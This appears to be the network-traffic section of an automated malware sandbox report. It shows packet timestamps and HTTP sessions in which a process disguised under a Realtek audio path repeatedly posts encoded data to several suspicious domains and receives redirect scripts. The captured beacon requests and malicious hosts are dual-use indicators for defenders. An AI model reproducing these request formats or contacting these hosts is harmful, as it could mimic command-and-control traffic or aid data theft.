                                                                                                                                                                              Jan 11, 2025 04:02:09.904984951 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.905251980 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.905499935 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:11.111927032 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.116837978 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.421610117 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.421798944 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.425354958 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.730308056 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.730467081 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.730647087 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:13.935868025 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:14.946826935 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.251804113 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.252096891 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.255738974 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.255806923 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:15.560668945 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.560858965 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561069965 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561315060 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561505079 CET8049854154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:15.561789989 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:16.760514975 CET4985480192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:17.768416882 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.073002100 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.073185921 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.075582981 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.380187035 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.380424023 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:18.380677938 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.381326914 CET4985580192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:18.685905933 CET8049855154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:23.391118050 CET4985680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 04:02:23.532685995 CET8049856208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:23.532902002 CET4985680192.168.11.20208.91.197.39
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                              Jan 11, 2025 04:00:40.206815958 CET53505011.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:47.191014051 CET53574611.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:55.212167025 CET5739253192.168.11.201.1.1.1
                                                                                                                                                                              Jan 11, 2025 04:00:55.754957914 CET53573921.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:14.897722006 CET53633981.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:14.902178049 CET53508911.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:15.044693947 CET53650991.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:20.700360060 CET53594911.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:38.861677885 CET53595991.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:07.407421112 CET53554531.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.117172956 CET53511381.1.1.1192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:27.303982973 CET53580621.1.1.1192.168.11.20
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
0           192.168.11.20  49758        76.223.54.146   80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:54:45.427309990 CET  491  OUT  GET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:54:45.568183899 CET  371  IN  HTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:54:45 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG"}</script></head></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
1           192.168.11.20  49759        209.74.77.109   80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:55:00.996870041 CET  761  OUT  POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
Jan 11, 2025 03:55:01.176788092 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:01 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
2           192.168.11.20  49760        209.74.77.109   80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:55:03.702002048 CET  781  OUT  POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
Jan 11, 2025 03:55:03.881547928 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:03 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
3           192.168.11.20  49761        209.74.77.109   80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:55:06.400052071 CET  7930  OUT  POST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:06.581365108 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:06 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
4           192.168.11.20  49762        209.74.77.109   80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:55:09.100864887 CET  489  OUT  GET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:09.280426979 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:09 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49763 | 27.124.4.246 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:15.029949903 CET | 755 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g86kpxjLFAyGRD3H1hmw74LuGcWjpo6xuZeA==
Jan 11, 2025 03:55:15.332195044 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49764 | 27.124.4.246 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:17.850078106 CET | 775 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9auSTQA4zvCDBGog4fDpYUdd867nABTZFo=
Jan 11, 2025 03:55:18.143449068 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49765 | 27.124.4.246 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:20.675431013 CET | 2578 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:20.675496101 CET | 5346 | OUT |
                                                                                                                                                                              Data Ascii: WZo7Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3
Jan 11, 2025 03:55:20.967662096 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49766 | 27.124.4.246 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:23.510467052 CET | 487 | OUT | GET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:23.806381941 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49767 | 46.30.211.38 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:29.402589083 CET | 761 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
Jan 11, 2025 03:55:29.635735035 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:29 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49768 | 46.30.211.38 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:32.163706064 CET | 781 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
Jan 11, 2025 03:55:32.403798103 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49769 | 46.30.211.38 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:34.914025068 CET | 2578 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:34.914060116 CET | 5156 | OUT |
